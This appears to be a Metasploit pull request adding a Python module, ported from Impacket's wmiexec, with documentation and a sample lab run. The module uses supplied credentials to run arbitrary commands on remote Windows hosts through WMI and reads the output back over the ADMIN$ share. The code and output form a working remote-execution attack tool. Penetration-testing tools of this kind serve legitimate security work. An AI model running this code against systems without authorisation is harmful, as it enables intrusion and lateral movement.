### PR TITLE
Add the scanner/smb/impacket/wmiexec module

### DIFF
--- a/documentation/modules/auxiliary/scanner/smb/impacket/wmiexec.md
+++ b/documentation/modules/auxiliary/scanner/smb/impacket/wmiexec.md
@@ -1,0 +1,92 @@
+## Verification Steps
+
+1. Install [Impacket][1] v0.9.17 from GitHub. The `impacket` package must be in
+   Python's module path, so `import impacket` works from any directory.
+1. Install [pycrypto][2] v2.7 (the experimental release). Impacket requires this
+   specific version.
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/smb/impacket/wmiexec`
+1. Set: `COMMAND`, `RHOSTS`, `SMBUser`, `SMBPass`
+1. Do: `run`, see the command result (if `OUTPUT` is enabled)
+
+## Options
+
+  **OUTPUT**
+  
+  When the `OUTPUT` option is enabled, the result of the command will be written
+  to a temporary file on the remote host and then retrieved. This allows the
+  module user to view the output but also causes it to be written to disk before
+  it is retrieved and deleted.
+
+## Scenario
+
+```
+metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/wmiexec) > show options 
+
+Module options (auxiliary/scanner/smb/impacket/wmiexec):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   COMMAND    ipconfig         yes       The command to execute
+   OUTPUT     true             yes       Get the output of the executed command
+   RHOSTS     192.168.90.11    yes       The target address range or CIDR identifier
+   SMBDomain  .                no        The Windows domain to use for authentication
+   SMBPass    wakawaka         yes       The password for the specified username
+   SMBUser    spencer          yes       The username to authenticate as
+   THREADS    1                yes       The number of concurrent threads
+
+metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/wmiexec) > run
+
+[*] [2018.04.04-17:10:47] Running for 192.168.90.11...
+[*] [2018.04.04-17:10:47] 192.168.90.11 - SMBv3.0 dialect used
+[*] [2018.04.04-17:10:47] 192.168.90.11 - Target system is 192.168.90.11 and isFDQN is False
+[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding: \\\\WINDOWS8VM[\\PIPE\\atsvc]
+[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding: Windows8VM[49154]
+[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding: 10.0.3.15[49154]
+[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding: 192.168.90.11[49154]
+[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding chosen: ncacn_ip_tcp:192.168.90.11[49154]
+[*] [2018.04.04-17:10:49] 
+Windows IP Configuration
+
+
+Ethernet adapter Ethernet 5:
+
+   Connection-specific DNS Suffix  . : foo.lan
+   Link-local IPv6 Address . . . . . : fe80::9ceb:820e:7c6b:def9%17
+   IPv4 Address. . . . . . . . . . . : 10.0.3.15
+   Subnet Mask . . . . . . . . . . . : 255.255.255.0
+   Default Gateway . . . . . . . . . : 10.0.3.2
+
+Ethernet adapter Local Area Connection:
+
+   Media State . . . . . . . . . . . : Media disconnected
+   Connection-specific DNS Suffix  . : 
+
+Ethernet adapter Ethernet 3:
+
+   Media State . . . . . . . . . . . : Media disconnected
+   Connection-specific DNS Suffix  . : 
+
+Ethernet adapter Ethernet 4:
+
+   Connection-specific DNS Suffix  . : 
+   IPv4 Address. . . . . . . . . . . : 192.168.90.11
+   Subnet Mask . . . . . . . . . . . : 255.255.255.0
+   Default Gateway . . . . . . . . . : 
+
+Tunnel adapter isatap.foo.lan:
+
+   Media State . . . . . . . . . . . : Media disconnected
+   Connection-specific DNS Suffix  . : foo.lan
+
+Tunnel adapter isatap.{70FE2ED7-E141-40A9-9CAF-E8556F6A4E80}:
+
+   Media State . . . . . . . . . . . : Media disconnected
+   Connection-specific DNS Suffix  . : 
+
+[*] [2018.04.04-17:10:49] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+[1]: https://github.com/CoreSecurity/impacket
+[2]: https://www.dlitz.net/software/pycrypto/

--- a/modules/auxiliary/scanner/smb/impacket/wmiexec.py
+++ b/modules/auxiliary/scanner/smb/impacket/wmiexec.py
@@ -1,0 +1,137 @@
+#!/usr/bin/env python
+# Copyright (c) 2003-2018 CORE Security Technologies
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+
+import logging
+import os
+import string
+import sys
+
+try:
+    from impacket.smbconnection import SMBConnection, SMB_DIALECT, \
+        SMB2_DIALECT_002, SMB2_DIALECT_21
+    from impacket.dcerpc.v5.dcomrt import DCOMConnection
+    from impacket.dcerpc.v5.dcom import wmi
+    from impacket.dcerpc.v5.dtypes import NULL
+except ImportError:
+    dependencies_missing = True
+else:
+    dependencies_missing = False
+
+import _msf_impacket
+import metasploit.module as module
+
+metadata = {
+    'name': 'WMI Exec',
+    'description': '''
+        A similar approach to psexec but executing commands through WMI.
+     ''',
+    'authors': ['beto', 'Spencer McIntyre'],
+    'date': '2018-03-19',
+    'license': 'CORE_LICENSE',
+    'references': [
+        {'type': 'url', 'ref': 'https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py'},
+        {'type': 'aka', 'ref': 'wmiexec.py'},
+     ],
+    'type': 'single_scanner',
+    'options': {
+        'COMMAND':    {'type': 'string', 'description': 'The command to execute', 'required': True},
+        'OUTPUT':     {'type': 'bool',   'description': 'Get the output of the executed command', 'required': True, 'default': True},
+        'SMBDomain':  {'type': 'string', 'description': 'The Windows domain to use for authentication', 'required': False, 'default': '.'},
+        'SMBPass':    {'type': 'string', 'description': 'The password for the specified username', 'required': True, 'default': None},
+        'SMBUser':    {'type': 'string', 'description': 'The username to authenticate as', 'required': True, 'default': None},
+    }
+}
+
+
+class WMIEXEC:
+    def __init__(self, command='', username='', password='', domain='', hashes=None, share=None,
+                 noOutput=False):
+        self.__command = command
+        self.__username = username
+        self.__password = password
+        self.__domain = domain
+        self.__lmhash = ''
+        self.__nthash = ''
+        self.__aesKey = None
+        self.__share = share
+        self.__noOutput = noOutput
+        self.__doKerberos = False
+        self.__kdcHost = None
+        self.shell = None
+
+    def run(self, addr):
+        if self.__noOutput is False:
+            smbConnection = SMBConnection(addr, addr)
+            if self.__doKerberos is False:
+                smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
+            else:
+                smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash,
+                                            self.__nthash, self.__aesKey, kdcHost=self.__kdcHost)
+
+            dialect = smbConnection.getDialect()
+            if dialect == SMB_DIALECT:
+                logging.info("SMBv1 dialect used")
+            elif dialect == SMB2_DIALECT_002:
+                logging.info("SMBv2.0 dialect used")
+            elif dialect == SMB2_DIALECT_21:
+                logging.info("SMBv2.1 dialect used")
+            else:
+                logging.info("SMBv3.0 dialect used")
+        else:
+            smbConnection = None
+
+        dcom = DCOMConnection(addr, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
+                              self.__aesKey, oxidResolver=True, doKerberos=self.__doKerberos, kdcHost=self.__kdcHost)
+        try:
+            iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)
+            iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
+            iWbemServices= iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
+            iWbemLevel1Login.RemRelease()
+
+            win32Process,_ = iWbemServices.GetObject('Win32_Process')
+
+            self.shell = RemoteShell(self.__share, win32Process, smbConnection)
+            if self.__command != ' ':
+                self.shell.onecmd(self.__command)
+            else:
+                self.shell.cmdloop()
+        except (Exception, KeyboardInterrupt), e:
+            logging.error(str(e))
+
+        if smbConnection is not None:
+            smbConnection.logoff()
+        dcom.disconnect()
+
+
+class RemoteShell(_msf_impacket.RemoteShell):
+    def __init__(self, share, win32Process, smbConnection):
+        self.__win32Process = win32Process
+        self._pwd = 'C:\\'
+        self._shell = 'cmd.exe /Q /c '
+        super(RemoteShell, self).__init__(share, smbConnection)
+
+    def execute_remote(self, data):
+        command = self._shell + data 
+        if self._noOutput is False:
+            command += ' 1> ' + '\\\\127.0.0.1\\%s' % self._share + self._output  + ' 2>&1'
+        self.__win32Process.Create(command.decode('utf-8'), self._pwd, None)
+        self.get_output()
+
+
+def run(args):
+    if dependencies_missing:
+        module.log('Module dependencies (impacket) missing, cannot continue', level='error')
+        return
+
+    _msf_impacket.pre_run_hook(args)
+    executer = WMIEXEC(args['COMMAND'], args['SMBUser'], args['SMBPass'], args['SMBDomain'], 
+                        share='ADMIN$', noOutput=args['OUTPUT'] != 'true')
+    executer.run(args['rhost'])
+
+if __name__ == "__main__":
+    module.run(metadata, run)


### PR DESCRIPTION
This adds Impacket's [wmiexec][1] as an external module. The basic options were kept and carried over to the module version. The different settings are noted in the markdown documentation. This information was carried over from the original tool. The primary advantage of this module is the support for SMBv3.

This uses the same `_msf_impacket.py` library introduced for the `dcomexec` module added in PR #9816.

## Verification

List the steps needed to make sure this thing works

- [x] Install [Impacket][2] v0.9.17 from GitHub. The `impacket` package must be
      in Python's module path, so `import impacket` works from any directory.
- [x] Install [pycrypto][3] v2.7 (the experimental release). Impacket requires
      this specific version.
- [x] Start msfconsole
- [x] Do: `use auxiliary/scanner/smb/impacket/wmiexec`
- [x] Set: `COMMAND`, `RHOSTS`, `SMBUser`, `SMBPass`
- [x] Do: `run`, see the command result (if `OUTPUT` is enabled)
- [x] Do: `info -d`, see the module documentation and ensure it makes sense

### Example Output
```
metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/wmiexec) > show options 

Module options (auxiliary/scanner/smb/impacket/wmiexec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMAND    ipconfig         yes       The command to execute
   OUTPUT     true             yes       Get the output of the executed command
   RHOSTS     192.168.90.11    yes       The target address range or CIDR identifier
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass    wakawaka         yes       The password for the specified username
   SMBUser    spencer          yes       The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

metasploit-framework (S:0 J:1) auxiliary(scanner/smb/impacket/wmiexec) > run

[*] [2018.04.04-17:10:47] Running for 192.168.90.11...
[*] [2018.04.04-17:10:47] 192.168.90.11 - SMBv3.0 dialect used
[*] [2018.04.04-17:10:47] 192.168.90.11 - Target system is 192.168.90.11 and isFDQN is False
[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding: \\\\WINDOWS8VM[\\PIPE\\atsvc]
[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding: Windows8VM[49154]
[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding: 10.0.3.15[49154]
[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding: 192.168.90.11[49154]
[*] [2018.04.04-17:10:47] 192.168.90.11 - StringBinding chosen: ncacn_ip_tcp:192.168.90.11[49154]
[*] [2018.04.04-17:10:49] 
Windows IP Configuration


Ethernet adapter Ethernet 5:

   Connection-specific DNS Suffix  . : foo.lan
   Link-local IPv6 Address . . . . . : fe80::9ceb:820e:7c6b:def9%17
   IPv4 Address. . . . . . . . . . . : 10.0.3.15
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.3.2

Ethernet adapter Local Area Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Ethernet adapter Ethernet 3:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Ethernet adapter Ethernet 4:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.90.11
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 

Tunnel adapter isatap.foo.lan:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : foo.lan

Tunnel adapter isatap.{70FE2ED7-E141-40A9-9CAF-E8556F6A4E80}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

[*] [2018.04.04-17:10:49] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

[1]: https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
[2]: https://github.com/CoreSecurity/impacket
[3]: https://www.dlitz.net/software/pycrypto/
